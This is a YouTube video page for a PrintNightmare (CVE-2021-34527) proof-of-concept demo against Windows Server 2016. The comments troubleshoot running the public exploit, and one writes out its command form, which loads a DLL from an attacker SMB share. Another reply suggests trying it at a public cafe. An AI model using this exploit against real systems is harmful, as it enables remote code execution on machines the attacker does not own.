CVE-2021-34527 - PrintNightmare - Server 2016 PoC Demonstration

Поділитися
Вставка
  • Опубліковано 29 чер 2021
  • Quick video demonstrating the trivial ability to exploit the Print Spooler service. Screen on the left is the victim Server 2016 host. Screen on the right is the attacker running the PoC from github.com/cube0x0/CVE-2021-1...
    Note: Microsoft has now termed PrintNightmare as CVE-2021-34527, what some of us originally considered as CVE-2021-1675. The threat is still real-just had a naming confusion. Strictly 1675 was addressed in the June 8 updates but 34527/PrintNightmare still goes without a patch.
  • Наука та технологія

КОМЕНТАРІ • 42

  • @mauricestone6052
    @mauricestone6052 3 роки тому +3

    The first solution is to stop and deactivate the print spooler. But the customers cant print then, if they have printers on the network

  • @lostjohnny9000
    @lostjohnny9000 3 роки тому +4

    This is similar to the Win2K Secunia spooler exploit of 15 years ago

  • @redteamsskssk5049
    @redteamsskssk5049 2 роки тому

    Is there any tool/script to check the print spooler service is running on domain controllers remotely?

  • @diegocracker
    @diegocracker 2 роки тому

    Thanks

  • @daffodilistic
    @daffodilistic 2 роки тому +4

    Demo would be better if the "shutdown" or "msg" command is used, but still a valid PoC :)

  • @tylerthornsberry7775
    @tylerthornsberry7775 2 роки тому

    When I'm running the python script against the target, I'm receiving a "zsh: event not found: @[target_ip]" error. Anyone else experience this and if so, how do you get around it?

  • @deyo2794
    @deyo2794 3 роки тому +3

    I have tried same thing on Windows Server 2019. I can see the .dll upload but doesn't seem to execute.

    • @kylehanslovan303
      @kylehanslovan303 3 роки тому +2

      Any chance your box is a domain controller? If not, run dc promo and throw your exploit again. Several of us have observed similar oddities.

    • @deyo2794
      @deyo2794 3 роки тому +1

      @@kylehanslovan303 it is a Domain Controller already

    • @captainspolding6355
      @captainspolding6355 2 роки тому

      Same by me, have a solution found?

  • @sparrow243
    @sparrow243 3 роки тому

    Did They released patch or update to fix this vulnerability ;)

    • @Mondotrasho23
      @Mondotrasho23 2 роки тому

      Not yet

    • @johnbod
      @johnbod 2 роки тому

      They just did today as far back as Windows 7

  • @brakish3938
    @brakish3938 2 роки тому +1

    So does this exploit requires admin credentials

  • @zigaudrey
    @zigaudrey 2 роки тому

    As far as I understand, you are using the printer ID code to get to the computer ID and start hacking.
    Do we have to disable Spooler?

  • @jehbosheva
    @jehbosheva 3 роки тому +3

    Any patch release by Microsoft yet?

    • @kylehanslovan303
      @kylehanslovan303 3 роки тому +2

      Nothing as of this moment. There is more clarification that this vulnerability may be related but not specifically CVE-2021-1675. I imagine Microsoft’s poor team is burning the midnight oil to get the patch implemented and tested.

    • @viewitnow3539
      @viewitnow3539 3 роки тому

      @@kylehanslovan303 Sadly they didn't so so when writing the initial malware that is windoze.

  • @harshgupta1010
    @harshgupta1010 2 роки тому +1

    Source env/bin/activate
    Not activate evn

  • @modsmilzo644
    @modsmilzo644 3 роки тому +1

    Dude i have that errror, its impacket error ? or maybe windows 2016 server , y start the service manualy .... hope y can help me
    [-] Failed to enumerate remote pDriverPath
    module 'impacket.dcerpc.v5.rprn' has no attribute 'hRpcEnumPrinterDrivers'

    • @bilguun2765
      @bilguun2765 2 роки тому

      Did you solve this issue?

    • @dladuddnr
      @dladuddnr 2 роки тому

      I have same issue. did you solve the problem?

  • @kientran9766
    @kientran9766 2 роки тому

    i can't connect if victim does't use password.

  • @shaikabdullah3522
    @shaikabdullah3522 3 роки тому

    Getting connection failed on windows 10, unable to execute, is it affecting only DC? let me know if anyone have successfully executed the payload on win 10 machine.

    • @wenzhuding6876
      @wenzhuding6876 3 роки тому +1

      i execute it on DC but failed ,the dll file copied to server successfully,but it didnt copied to old folder

  • @sarunkim6096
    @sarunkim6096 2 роки тому

    How to download window 2016 vuln sir

  • @pheaktrakim1212
    @pheaktrakim1212 3 роки тому +2

    Only works the same network dude !

    • @deyo2794
      @deyo2794 3 роки тому

      correct. And my VM'a are on the same network

    • @pheaktrakim1212
      @pheaktrakim1212 3 роки тому

      @@deyo2794 Can you hack a real machine or something ?

    • @drozcan
      @drozcan 3 роки тому

      @@pheaktrakim1212 go to a public cafe or sth

    • @brakish3938
      @brakish3938 2 роки тому +2

      Needs port forwarding for exploitation over different network

    • @huor7360
      @huor7360 2 роки тому

      @@deyo2794 can u explain the Domain_name Ex: user:pass

  • @nishantbhagat7675
    @nishantbhagat7675 2 роки тому

    So you actually require Username and Password. wow.....

  • @burrytellam
    @burrytellam 3 роки тому +3

    It would be great if there was some commentary.

    • @shellcorp
      @shellcorp 3 роки тому +4

      What for? Video is straight forward and there's even a link to the exploit in the comments.

  • @kientran9766
    @kientran9766 2 роки тому +1

    When i tried to connect user victim and password victim, it worked. However, I tried to connect that doesn't used password, it didnt worked. The command used:
    Python3 CVE........ domain/user:@ip victim '\\ipattacker\smb\*.dll
    ..... now, i can't connect if victim doesn't password.

  • @nhattanmai
    @nhattanmai 2 роки тому

    Please help me, I get an error
    impacket.dcerpc.v5.rprn.DCERPCSessionError: RPRN SessionError: code: 0x35 - ERROR_BAD_NETPATH - The network path was not found.